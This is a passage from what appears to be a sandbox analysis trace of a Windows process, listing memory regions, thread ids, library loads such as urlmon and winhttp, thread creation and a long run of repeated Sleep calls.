0x281dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 2177 start_va = 0x2810000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2178 start_va = 0x36e0000 end_va = 0x375ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 2179 start_va = 0x2820000 end_va = 0x282dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 2180 start_va = 0x2810000 end_va = 0x281dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 2181 start_va = 0x2810000 end_va = 0x281dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 2182 start_va = 0x2810000 end_va = 0x2810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2183 start_va = 0x2820000 end_va = 0x282dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 2184 start_va = 0x46a0000 end_va = 0x4799fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 2185 start_va = 0x2810000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2186 start_va = 0x2820000 end_va = 0x282dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 2187 start_va = 0x2810000 end_va = 0x281dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 2188 start_va = 0x2810000 end_va = 0x281dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 2189 start_va = 0x2810000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2190 start_va = 0x2820000 end_va = 0x282dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 2191 start_va = 0x2810000 end_va = 0x281dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Thread: id = 3 os_tid = 0xdc0 Thread: id = 4 os_tid = 0xd44 Thread: id = 5 os_tid = 0xd3c Thread: id = 6 os_tid = 0x8a4 Thread: id = 7 os_tid = 0x888 Thread: id = 8 os_tid = 0x884 Thread: id = 9 os_tid = 0x538 Thread: id = 10 os_tid = 0x27c Thread: id = 11 os_tid = 0x764 Thread: id = 12 os_tid = 0x720 Thread: id = 13 os_tid = 0x6e4 Thread: id = 14 os_tid = 0x7b4 Thread: id = 15 os_tid = 0x7f4 Thread: id = 16 os_tid = 0x5b0 Thread: id = 17 os_tid = 0x320 Thread: id = 18 os_tid = 0x594 Thread: id = 19 os_tid = 0x588 Thread: id = 20 os_tid = 0x4b8 Thread: id = 21 os_tid = 0x4b4 Thread: id = 22 os_tid = 0x434 Thread: id = 23 os_tid = 0x7e4 Thread: id = 24 os_tid = 0x5dc Thread: id = 25 os_tid = 0x544 Thread: id = 26 os_tid = 0x4e4 Thread: id = 27 os_tid = 0x4cc Thread: id = 28 os_tid = 0x4c8 Thread: id = 29 os_tid = 0x4c4 Thread: id = 30 os_tid = 0x4a8 Thread: id = 31 os_tid = 0x4a4 Thread: id = 32 os_tid = 0x4a0 Thread: id = 33 os_tid = 0x404 Thread: id = 34 os_tid = 0x288 Thread: id = 35 os_tid = 0x168 Thread: id = 36 os_tid = 0x148 Thread: id = 37 os_tid = 0x394 Thread: id = 38 os_tid = 0x13c Thread: id = 39 os_tid = 0xec0 [0087.703] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77800000 [0087.705] GetProcAddress (hModule=0x77800000, lpProcName="RtlExitUserThread") returned 0x77846930 [0087.707] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x82f0000 [0088.556] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10) returned 0x82f12f0 [0088.556] LoadLibraryA (lpLibFileName="user32") returned 0x775e0000 [0088.557] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x10 [0088.571] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0088.571] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f12f0 [0088.571] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefefb0000 [0088.572] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x12 [0088.573] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0088.573] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10) returned 0x82f12f0 [0088.573] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefdb20000 [0088.574] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x10 [0088.574] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0088.574] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0xf) returned 0x82f12f0 [0088.574] LoadLibraryA (lpLibFileName="ole32") returned 0x7feff2f0000 [0088.575] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0xf [0088.575] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0088.575] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x11) returned 0x82f12f0 [0088.575] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef5a80000 [0089.039] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x11 [0089.039] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0089.039] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10) returned 0x82f12f0 [0089.039] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7feffac0000 [0089.040] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x10 [0089.040] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0089.040] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10) returned 0x82f12f0 [0089.040] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefce60000 [0089.053] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x10 [0089.053] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0089.053] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x11) returned 0x82f12f0 [0089.053] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefdee0000 [0089.054] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x11 [0089.054] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0089.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x36c3ca4, lpParameter=0x27a0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6d4 [0089.056] CloseHandle (hObject=0x6d4) returned 1 [0089.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x36c3d80, lpParameter=0x27a0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6d4 [0089.057] CloseHandle (hObject=0x6d4) returned 1 [0089.057] Sleep (dwMilliseconds=0xa) [0089.063] Sleep (dwMilliseconds=0xa) [0089.079] Sleep (dwMilliseconds=0xa) [0089.095] Sleep (dwMilliseconds=0xa) [0089.110] Sleep (dwMilliseconds=0xa) [0089.126] Sleep (dwMilliseconds=0xa) [0089.141] Sleep (dwMilliseconds=0xa) [0089.157] Sleep (dwMilliseconds=0xa) [0089.176] Sleep (dwMilliseconds=0xa) [0089.188] Sleep (dwMilliseconds=0xa) [0089.204] Sleep (dwMilliseconds=0xa) [0089.219] Sleep (dwMilliseconds=0xa) [0089.235] Sleep (dwMilliseconds=0xa) [0089.250] Sleep (dwMilliseconds=0xa) [0089.282] Sleep (dwMilliseconds=0xa) [0089.297] Sleep (dwMilliseconds=0xa) [0089.313] Sleep (dwMilliseconds=0xa) [0089.328] Sleep (dwMilliseconds=0xa) [0089.344] Sleep (dwMilliseconds=0xa) [0089.359] Sleep (dwMilliseconds=0xa) [0089.375] Sleep (dwMilliseconds=0xa) [0089.391] Sleep (dwMilliseconds=0xa) [0089.407] Sleep (dwMilliseconds=0xa) [0089.422] Sleep (dwMilliseconds=0xa) [0089.438] Sleep (dwMilliseconds=0xa) [0089.453] Sleep (dwMilliseconds=0xa) [0089.472] Sleep (dwMilliseconds=0xa) [0089.485] Sleep (dwMilliseconds=0xa) [0089.502] Sleep (dwMilliseconds=0xa) [0089.516] Sleep (dwMilliseconds=0xa) [0089.531] Sleep (dwMilliseconds=0xa) [0089.547] Sleep (dwMilliseconds=0xa) [0089.563] Sleep (dwMilliseconds=0xa) [0089.578] Sleep (dwMilliseconds=0xa) [0089.594] Sleep (dwMilliseconds=0xa) [0089.609] Sleep (dwMilliseconds=0xa) [0089.625] Sleep (dwMilliseconds=0xa) [0089.640] Sleep (dwMilliseconds=0xa) [0089.656] Sleep (dwMilliseconds=0xa) [0089.671] Sleep (dwMilliseconds=0xa) [0089.687] Sleep (dwMilliseconds=0xa) [0089.703] Sleep (dwMilliseconds=0xa) [0089.719] Sleep (dwMilliseconds=0xa) [0089.734] Sleep (dwMilliseconds=0xa) [0089.750] Sleep (dwMilliseconds=0xa) [0089.766] Sleep (dwMilliseconds=0xa) [0089.783] Sleep (dwMilliseconds=0xa) [0089.824] Sleep (dwMilliseconds=0xa) [0089.871] Sleep (dwMilliseconds=0xa) [0089.891] Sleep (dwMilliseconds=0xa) [0089.891] Sleep (dwMilliseconds=0xa) [0089.906] Sleep (dwMilliseconds=0xa) [0089.921] Sleep (dwMilliseconds=0xa) [0089.937] Sleep (dwMilliseconds=0xa) [0089.952] Sleep (dwMilliseconds=0xa) [0089.968] Sleep (dwMilliseconds=0xa) [0089.984] Sleep (dwMilliseconds=0xa) [0090.017] Sleep (dwMilliseconds=0xa) [0090.052] Sleep (dwMilliseconds=0xa) [0090.062] Sleep (dwMilliseconds=0xa) [0090.077] Sleep (dwMilliseconds=0xa) [0090.094] Sleep (dwMilliseconds=0xa) [0090.108] Sleep (dwMilliseconds=0xa) [0090.124] Sleep (dwMilliseconds=0xa) [0090.140] Sleep (dwMilliseconds=0xa) [0090.156] Sleep (dwMilliseconds=0xa) [0090.192] Sleep (dwMilliseconds=0xa) [0090.227] Sleep (dwMilliseconds=0xa) [0090.233] Sleep (dwMilliseconds=0xa) [0090.249] Sleep (dwMilliseconds=0xa) [0090.274] Sleep (dwMilliseconds=0xa) [0090.289] Sleep (dwMilliseconds=0xa) [0090.301] Sleep (dwMilliseconds=0xa) [0090.311] Sleep (dwMilliseconds=0xa) [0090.331] Sleep (dwMilliseconds=0xa) [0090.366] Sleep (dwMilliseconds=0xa) [0090.396] Sleep (dwMilliseconds=0xa) [0090.405] Sleep (dwMilliseconds=0xa) [0090.420] Sleep (dwMilliseconds=0xa) [0090.437] Sleep (dwMilliseconds=0xa) [0090.454] Sleep (dwMilliseconds=0xa) [0090.478] Sleep (dwMilliseconds=0xa) [0090.483] Sleep (dwMilliseconds=0xa) [0090.498] Sleep (dwMilliseconds=0xa) [0090.531] Sleep (dwMilliseconds=0xa) [0090.555] Sleep (dwMilliseconds=0xa) [0090.561] Sleep (dwMilliseconds=0xa) [0090.577] Sleep (dwMilliseconds=0xa) [0090.592] Sleep (dwMilliseconds=0xa) [0090.609] Sleep (dwMilliseconds=0xa) [0090.630] Sleep (dwMilliseconds=0xa) [0090.641] Sleep (dwMilliseconds=0xa) [0090.655] Sleep (dwMilliseconds=0xa) [0090.709] Sleep (dwMilliseconds=0xa) [0090.732] Sleep (dwMilliseconds=0xa) [0090.769] Sleep (dwMilliseconds=0xa) [0090.784] Sleep (dwMilliseconds=0xa) [0090.805] Sleep (dwMilliseconds=0xa) [0090.811] Sleep (dwMilliseconds=0xa) [0090.826] Sleep (dwMilliseconds=0xa) [0090.876] Sleep (dwMilliseconds=0xa) [0090.897] Sleep (dwMilliseconds=0xa) [0090.904] Sleep (dwMilliseconds=0xa) [0090.924] Sleep (dwMilliseconds=0xa) [0090.936] Sleep (dwMilliseconds=0xa) [0090.960] Sleep (dwMilliseconds=0xa) [0090.982] Sleep (dwMilliseconds=0xa) [0090.998] Sleep (dwMilliseconds=0xa) [0091.044] Sleep (dwMilliseconds=0xa) [0091.060] Sleep (dwMilliseconds=0xa) [0091.075] Sleep (dwMilliseconds=0xa) [0091.091] Sleep (dwMilliseconds=0xa) [0091.107] Sleep (dwMilliseconds=0xa) [0091.123] Sleep (dwMilliseconds=0xa) [0091.139] Sleep (dwMilliseconds=0xa) [0091.154] Sleep (dwMilliseconds=0xa) [0091.201] Sleep (dwMilliseconds=0xa) [0091.224] Sleep (dwMilliseconds=0xa) [0091.232] Sleep (dwMilliseconds=0xa) [0091.249] Sleep (dwMilliseconds=0xa) [0091.271] Sleep (dwMilliseconds=0xa) [0091.293] Sleep (dwMilliseconds=0xa) [0091.294] Sleep (dwMilliseconds=0xa) [0091.313] Sleep (dwMilliseconds=0xa) [0091.331] Sleep (dwMilliseconds=0xa) [0091.387] Sleep (dwMilliseconds=0xa) [0091.416] Sleep (dwMilliseconds=0xa) [0091.419] Sleep (dwMilliseconds=0xa) [0091.436] Sleep (dwMilliseconds=0xa) [0091.467] Sleep (dwMilliseconds=0xa) [0091.481] Sleep (dwMilliseconds=0xa) [0091.497] Sleep (dwMilliseconds=0xa) [0091.514] Sleep (dwMilliseconds=0xa) [0091.560] Sleep (dwMilliseconds=0xa) [0091.575] Sleep (dwMilliseconds=0xa) [0091.594] Sleep (dwMilliseconds=0xa) [0091.622] Sleep (dwMilliseconds=0xa) [0091.637] Sleep (dwMilliseconds=0xa) [0091.653] Sleep (dwMilliseconds=0xa) [0091.669] Sleep (dwMilliseconds=0xa) [0091.717] Sleep (dwMilliseconds=0xa) [0091.731] Sleep (dwMilliseconds=0xa) [0091.746] Sleep (dwMilliseconds=0xa) [0091.763] Sleep (dwMilliseconds=0xa) [0091.778] Sleep (dwMilliseconds=0xa) [0091.793] Sleep (dwMilliseconds=0xa) [0091.809] Sleep (dwMilliseconds=0xa) [0091.824] Sleep (dwMilliseconds=0xa) [0091.872] Sleep (dwMilliseconds=0xa) [0091.887] Sleep (dwMilliseconds=0xa) [0091.902] Sleep (dwMilliseconds=0xa) [0091.918] Sleep (dwMilliseconds=0xa) [0091.934] Sleep (dwMilliseconds=0xa) [0091.949] Sleep (dwMilliseconds=0xa) [0091.965] Sleep (dwMilliseconds=0xa) [0091.980] Sleep (dwMilliseconds=0xa) [0092.027] Sleep (dwMilliseconds=0xa) [0092.043] Sleep (dwMilliseconds=0xa) [0092.058] Sleep (dwMilliseconds=0xa) [0092.074] Sleep (dwMilliseconds=0xa) [0092.090] Sleep (dwMilliseconds=0xa) [0092.107] Sleep (dwMilliseconds=0xa) [0092.121] Sleep (dwMilliseconds=0xa) [0092.140] Sleep (dwMilliseconds=0xa) [0092.183] Sleep (dwMilliseconds=0xa) [0092.205] Sleep (dwMilliseconds=0xa) [0092.223] Sleep (dwMilliseconds=0xa) [0092.232] Sleep (dwMilliseconds=0xa) [0092.247] Sleep (dwMilliseconds=0xa) [0092.265] Sleep (dwMilliseconds=0xa) [0092.305] Sleep (dwMilliseconds=0xa) [0092.312] Sleep (dwMilliseconds=0xa) [0092.355] Sleep (dwMilliseconds=0xa) [0092.390] Sleep (dwMilliseconds=0xa) [0092.403] Sleep (dwMilliseconds=0xa) [0092.417] Sleep (dwMilliseconds=0xa) [0092.433] Sleep (dwMilliseconds=0xa) [0092.448] Sleep (dwMilliseconds=0xa) [0092.464] Sleep (dwMilliseconds=0xa) [0092.480] Sleep (dwMilliseconds=0xa) [0092.495] Sleep (dwMilliseconds=0xa) [0092.537] Sleep (dwMilliseconds=0xa) [0092.593] Sleep (dwMilliseconds=0xa) [0092.644] Sleep (dwMilliseconds=0xa) [0092.683] Sleep (dwMilliseconds=0xa) [0092.698] Sleep (dwMilliseconds=0xa) [0092.714] Sleep (dwMilliseconds=0xa) [0092.730] Sleep (dwMilliseconds=0xa) [0092.747] Sleep (dwMilliseconds=0xa) [0092.760] Sleep (dwMilliseconds=0xa) [0092.777] Sleep (dwMilliseconds=0xa) [0092.792] Sleep (dwMilliseconds=0xa) [0092.840] Sleep (dwMilliseconds=0xa) [0092.901] Sleep (dwMilliseconds=0xa) [0092.953] Sleep (dwMilliseconds=0xa) [0092.969] Sleep (dwMilliseconds=0xa) [0092.979] Sleep (dwMilliseconds=0xa) [0092.995] Sleep (dwMilliseconds=0xa) [0093.023] Sleep (dwMilliseconds=0xa) [0093.031] Sleep (dwMilliseconds=0xa) [0093.041] Sleep (dwMilliseconds=0xa) [0093.058] Sleep (dwMilliseconds=0xa) [0093.100] Sleep (dwMilliseconds=0xa) [0093.135] Sleep (dwMilliseconds=0xa) [0093.182] Sleep (dwMilliseconds=0xa) [0093.230] Sleep (dwMilliseconds=0xa) [0093.244] Sleep (dwMilliseconds=0xa) [0093.261] Sleep (dwMilliseconds=0xa) [0093.302] Sleep (dwMilliseconds=0xa) [0093.309] Sleep (dwMilliseconds=0xa) [0093.322] Sleep (dwMilliseconds=0xa) [0093.338] Sleep (dwMilliseconds=0xa) [0093.384] Sleep (dwMilliseconds=0xa) [0093.400] Sleep (dwMilliseconds=0xa) [0093.416] Sleep (dwMilliseconds=0xa) [0093.431] Sleep (dwMilliseconds=0xa) [0093.447] Sleep (dwMilliseconds=0xa) [0093.463] Sleep (dwMilliseconds=0xa) [0093.479] Sleep (dwMilliseconds=0xa) [0093.494] Sleep (dwMilliseconds=0xa) [0093.540] Sleep (dwMilliseconds=0xa) [0093.556] Sleep (dwMilliseconds=0xa) [0093.572] Sleep (dwMilliseconds=0xa) [0093.588] Sleep (dwMilliseconds=0xa) [0093.603] Sleep (dwMilliseconds=0xa) [0093.620] Sleep (dwMilliseconds=0xa) [0093.634] Sleep (dwMilliseconds=0xa) [0093.650] Sleep (dwMilliseconds=0xa) [0093.697] Sleep (dwMilliseconds=0xa) [0093.712] Sleep (dwMilliseconds=0xa) [0093.730] Sleep (dwMilliseconds=0xa) [0093.747] Sleep (dwMilliseconds=0xa) [0093.759] Sleep (dwMilliseconds=0xa) [0093.774] Sleep (dwMilliseconds=0xa) [0093.790] Sleep (dwMilliseconds=0xa) [0093.806] Sleep (dwMilliseconds=0xa) [0093.855] Sleep (dwMilliseconds=0xa) [0093.877] Sleep (dwMilliseconds=0xa) [0093.884] Sleep (dwMilliseconds=0xa) [0093.902] Sleep (dwMilliseconds=0xa) [0093.915] Sleep (dwMilliseconds=0xa) [0093.931] Sleep (dwMilliseconds=0xa) [0093.946] Sleep (dwMilliseconds=0xa) [0093.961] Sleep (dwMilliseconds=0xa) [0093.984] Sleep (dwMilliseconds=0xa) [0094.025] Sleep (dwMilliseconds=0xa) [0094.049] Sleep (dwMilliseconds=0xa) [0094.056] Sleep (dwMilliseconds=0xa) [0094.071] Sleep (dwMilliseconds=0xa) [0094.086] Sleep (dwMilliseconds=0xa) [0094.102] Sleep (dwMilliseconds=0xa) [0094.117] Sleep (dwMilliseconds=0xa) [0094.134] Sleep (dwMilliseconds=0xa) [0094.149] Sleep (dwMilliseconds=0xa) [0094.196] Sleep (dwMilliseconds=0xa) [0094.214] Sleep (dwMilliseconds=0xa) [0094.227] Sleep (dwMilliseconds=0xa) [0094.243] Sleep (dwMilliseconds=0xa) [0094.258] Sleep (dwMilliseconds=0xa) [0094.284] Sleep (dwMilliseconds=0xa) [0094.289] Sleep (dwMilliseconds=0xa) [0094.305] Sleep (dwMilliseconds=0xa) [0094.322] Sleep (dwMilliseconds=0xa) [0094.376] Sleep (dwMilliseconds=0xa) [0094.403] Sleep (dwMilliseconds=0xa) [0094.415] Sleep (dwMilliseconds=0xa) [0094.430] Sleep (dwMilliseconds=0xa) [0094.445] Sleep (dwMilliseconds=0xa) [0094.461] Sleep (dwMilliseconds=0xa) [0094.476] Sleep (dwMilliseconds=0xa) [0094.492] Sleep (dwMilliseconds=0xa) [0094.508] Sleep (dwMilliseconds=0xa) [0094.556] Sleep (dwMilliseconds=0xa) [0094.577] Sleep (dwMilliseconds=0xa) [0094.585] Sleep (dwMilliseconds=0xa) [0094.601] Sleep (dwMilliseconds=0xa) [0094.617] Sleep (dwMilliseconds=0xa) [0094.632] Sleep (dwMilliseconds=0xa) [0094.652] Sleep (dwMilliseconds=0xa) [0094.664] Sleep (dwMilliseconds=0xa) [0094.685] Sleep (dwMilliseconds=0xa) [0094.739] Sleep (dwMilliseconds=0xa) [0094.752] Sleep (dwMilliseconds=0xa) [0094.757] Sleep (dwMilliseconds=0xa) [0094.779] Sleep (dwMilliseconds=0xa) [0094.788] Sleep (dwMilliseconds=0xa) [0094.805] Sleep (dwMilliseconds=0xa) [0094.820] Sleep (dwMilliseconds=0xa) [0094.836] Sleep (dwMilliseconds=0xa) [0094.851] Sleep (dwMilliseconds=0xa) [0094.901] Sleep (dwMilliseconds=0xa) [0094.937] Sleep (dwMilliseconds=0xa) [0094.945] Sleep (dwMilliseconds=0xa) [0094.963] Sleep (dwMilliseconds=0xa) [0094.978] Sleep (dwMilliseconds=0xa) [0094.991] Sleep (dwMilliseconds=0xa) [0095.008] Sleep (dwMilliseconds=0xa) [0095.026] Sleep (dwMilliseconds=0xa) [0095.069] Sleep (dwMilliseconds=0xa) [0095.099] Sleep (dwMilliseconds=0xa) [0095.100] Sleep (dwMilliseconds=0xa) [0095.120] Sleep (dwMilliseconds=0xa) [0095.135] Sleep (dwMilliseconds=0xa) [0095.148] Sleep (dwMilliseconds=0xa) [0095.164] Sleep (dwMilliseconds=0xa) [0095.179] Sleep (dwMilliseconds=0xa) [0095.195] Sleep (dwMilliseconds=0xa) [0095.257] Sleep (dwMilliseconds=0xa) [0095.305] Sleep (dwMilliseconds=0xa) [0095.319] Sleep (dwMilliseconds=0xa) [0095.335] Sleep (dwMilliseconds=0xa) [0095.351] Sleep (dwMilliseconds=0xa) [0095.368] Sleep (dwMilliseconds=0xa) [0095.402] Sleep (dwMilliseconds=0xa) [0095.416] Sleep (dwMilliseconds=0xa) [0095.462] Sleep (dwMilliseconds=0xa) [0095.503] Sleep (dwMilliseconds=0xa) [0095.506] Sleep (dwMilliseconds=0xa) [0095.524] Sleep (dwMilliseconds=0xa) [0095.545] Sleep (dwMilliseconds=0xa) [0095.553] Sleep (dwMilliseconds=0xa) [0095.574] Sleep (dwMilliseconds=0xa) [0095.587] Sleep (dwMilliseconds=0xa) [0095.602] Sleep (dwMilliseconds=0xa) [0095.648] Sleep (dwMilliseconds=0xa) [0095.691] Sleep (dwMilliseconds=0xa) [0095.693] Sleep (dwMilliseconds=0xa) [0095.720] Sleep (dwMilliseconds=0xa) [0095.726] Sleep (dwMilliseconds=0xa) [0095.740] Sleep (dwMilliseconds=0xa) [0095.776] Sleep (dwMilliseconds=0xa) [0095.788] Sleep (dwMilliseconds=0xa) [0095.833] Sleep (dwMilliseconds=0xa) [0095.858] Sleep (dwMilliseconds=0xa) [0095.871] Sleep (dwMilliseconds=0xa) [0095.881] Sleep (dwMilliseconds=0xa) [0095.898] Sleep (dwMilliseconds=0xa) [0095.912] Sleep (dwMilliseconds=0xa) [0095.928] Sleep (dwMilliseconds=0xa) [0095.943] Sleep (dwMilliseconds=0xa) [0095.960] Sleep (dwMilliseconds=0xa) [0096.008] Sleep (dwMilliseconds=0xa) [0096.033] Sleep (dwMilliseconds=0xa) [0096.043] Sleep (dwMilliseconds=0xa) [0096.059] Sleep (dwMilliseconds=0xa) [0096.070] Sleep (dwMilliseconds=0xa) [0096.097] Sleep (dwMilliseconds=0xa) [0096.099] Sleep (dwMilliseconds=0xa) [0096.114] Sleep (dwMilliseconds=0xa) [0096.132] Sleep (dwMilliseconds=0xa) [0096.179] Sleep (dwMilliseconds=0xa) [0096.205] Sleep (dwMilliseconds=0xa) [0096.210] Sleep (dwMilliseconds=0xa) [0096.224] Sleep (dwMilliseconds=0xa) [0096.255] Sleep (dwMilliseconds=0xa) [0096.288] Sleep (dwMilliseconds=0xa) [0096.305] Sleep (dwMilliseconds=0xa) [0096.350] Sleep (dwMilliseconds=0xa) [0096.370] Sleep (dwMilliseconds=0xa) [0096.379] Sleep (dwMilliseconds=0xa) [0096.398] Sleep (dwMilliseconds=0xa) [0096.422] Sleep (dwMilliseconds=0xa) [0096.427] Sleep (dwMilliseconds=0xa) [0096.447] Sleep (dwMilliseconds=0xa) [0096.458] Sleep (dwMilliseconds=0xa) [0096.473] Sleep (dwMilliseconds=0xa) [0096.521] Sleep (dwMilliseconds=0xa) [0096.537] Sleep (dwMilliseconds=0xa) [0096.555] Sleep (dwMilliseconds=0xa) [0096.568] Sleep (dwMilliseconds=0xa) [0096.583] Sleep (dwMilliseconds=0xa) [0096.598] Sleep (dwMilliseconds=0xa) [0096.617] Sleep (dwMilliseconds=0xa) [0096.631] Sleep (dwMilliseconds=0xa) [0096.645] Sleep (dwMilliseconds=0xa) [0096.708] Sleep (dwMilliseconds=0xa) [0096.727] Sleep (dwMilliseconds=0xa) [0096.740] Sleep (dwMilliseconds=0xa) [0096.758] Sleep (dwMilliseconds=0xa) [0096.769] Sleep (dwMilliseconds=0xa) [0096.786] Sleep (dwMilliseconds=0xa) [0096.801] Sleep (dwMilliseconds=0xa) [0096.817] Sleep (dwMilliseconds=0xa) [0096.845] Sleep (dwMilliseconds=0xa) [0096.879] Sleep (dwMilliseconds=0xa) [0096.910] Sleep (dwMilliseconds=0xa) [0096.926] Sleep (dwMilliseconds=0xa) [0096.941] Sleep (dwMilliseconds=0xa) [0096.957] Sleep (dwMilliseconds=0xa) [0096.972] Sleep (dwMilliseconds=0xa) [0096.988] Sleep (dwMilliseconds=0xa) [0097.004] Sleep (dwMilliseconds=0xa) [0097.054] Sleep (dwMilliseconds=0xa) [0097.073] Sleep (dwMilliseconds=0xa) [0097.086] Sleep (dwMilliseconds=0xa) [0097.098] Sleep (dwMilliseconds=0xa) [0097.115] Sleep (dwMilliseconds=0xa) [0097.129] Sleep (dwMilliseconds=0xa) [0097.144] Sleep (dwMilliseconds=0xa) [0097.161] Sleep (dwMilliseconds=0xa) [0097.179] Sleep (dwMilliseconds=0xa) [0097.223] Sleep (dwMilliseconds=0xa) [0097.247] Sleep (dwMilliseconds=0xa) [0097.254] Sleep (dwMilliseconds=0xa) [0097.290] Sleep (dwMilliseconds=0xa) [0097.302] Sleep (dwMilliseconds=0xa) [0097.316] Sleep (dwMilliseconds=0xa) [0097.331] Sleep (dwMilliseconds=0xa) [0097.357] Sleep (dwMilliseconds=0xa) [0097.395] Sleep (dwMilliseconds=0xa) [0097.426] Sleep (dwMilliseconds=0xa) [0097.446] Sleep (dwMilliseconds=0xa) [0097.457] Sleep (dwMilliseconds=0xa) [0097.477] Sleep (dwMilliseconds=0xa) [0097.487] Sleep (dwMilliseconds=0xa) [0097.503] Sleep (dwMilliseconds=0xa) [0097.518] Sleep (dwMilliseconds=0xa) [0097.537] Sleep (dwMilliseconds=0xa) [0097.582] Sleep (dwMilliseconds=0xa) [0097.599] Sleep (dwMilliseconds=0xa) [0097.613] Sleep (dwMilliseconds=0xa) [0097.627] Sleep (dwMilliseconds=0xa) [0097.643] Sleep (dwMilliseconds=0xa) [0097.659] Sleep (dwMilliseconds=0xa) [0097.674] Sleep (dwMilliseconds=0xa) [0097.695] Sleep (dwMilliseconds=0xa) [0097.738] Sleep (dwMilliseconds=0xa) [0097.767] Sleep (dwMilliseconds=0xa) [0097.786] Sleep (dwMilliseconds=0xa) [0097.800] Sleep (dwMilliseconds=0xa) [0097.815] Sleep (dwMilliseconds=0xa) [0097.830] Sleep (dwMilliseconds=0xa) [0097.847] Sleep (dwMilliseconds=0xa) [0097.873] Sleep (dwMilliseconds=0xa) [0097.908] Sleep (dwMilliseconds=0xa) [0097.958] Sleep (dwMilliseconds=0xa) [0097.971] Sleep (dwMilliseconds=0xa) [0097.987] Sleep (dwMilliseconds=0xa) [0098.002] Sleep (dwMilliseconds=0xa) [0098.017] Sleep (dwMilliseconds=0xa) [0098.035] Sleep (dwMilliseconds=0xa) [0098.049] Sleep (dwMilliseconds=0xa) [0098.065] Sleep (dwMilliseconds=0xa) [0098.112] Sleep (dwMilliseconds=0xa) [0098.135] Sleep (dwMilliseconds=0xa) [0098.142] Sleep (dwMilliseconds=0xa) [0098.160] Sleep (dwMilliseconds=0xa) [0098.175] Sleep (dwMilliseconds=0xa) [0098.197] Sleep (dwMilliseconds=0xa) [0098.205] Sleep (dwMilliseconds=0xa) [0098.223] Sleep (dwMilliseconds=0xa) [0098.239] Sleep 